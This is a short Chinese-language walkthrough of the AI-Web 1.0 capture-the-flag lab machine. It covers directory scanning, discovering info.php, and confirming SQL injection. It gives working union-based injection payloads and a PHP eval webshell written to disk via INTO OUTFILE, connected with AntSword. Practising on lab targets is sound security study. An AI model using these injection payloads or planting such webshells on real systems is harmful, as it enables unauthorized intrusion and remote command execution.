Ai-web 1.0靶场通关攻略
1.环境
虚拟机:kali
靶机:ai-web-1.0
2.获取靶机ip
确认靶机ip为192.168.13.160
3.获取绝对路径
用御剑扫描发现两个路径
http://192.168.13.160/robots. txt和http://192.168.13.160/index.html
发现一些路径
用kali的dirb扫描发现一个info.php文件
浏览器访问
获得了网站的绝对路径
4.判断是否存在注入
用dirb扫描另一个路径
发现一个index.php文件,浏览器访问
页面显示提交框,猜测存在sql注入
输入框输入1提交,页面正常,出现回显
输入框输入1'提交,发现报sql语句错,存在sql注入漏洞
5.获取数据库名
使用burpsuite抓包,得到注入点位置。输入1提交抓包
判断列数
' order by 3#
4时出错所以为3列
说明此数据库有三列,下面确定回显位
' union select 1,2,3#
然后获取数据库名称
' union select 1,database(),3#
该数据库名称为 aiweb1
之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。
6.一句话木马上传文件
由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。
-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#
上传成功后路径打开2.php蚁剑连接成功我的找不到路径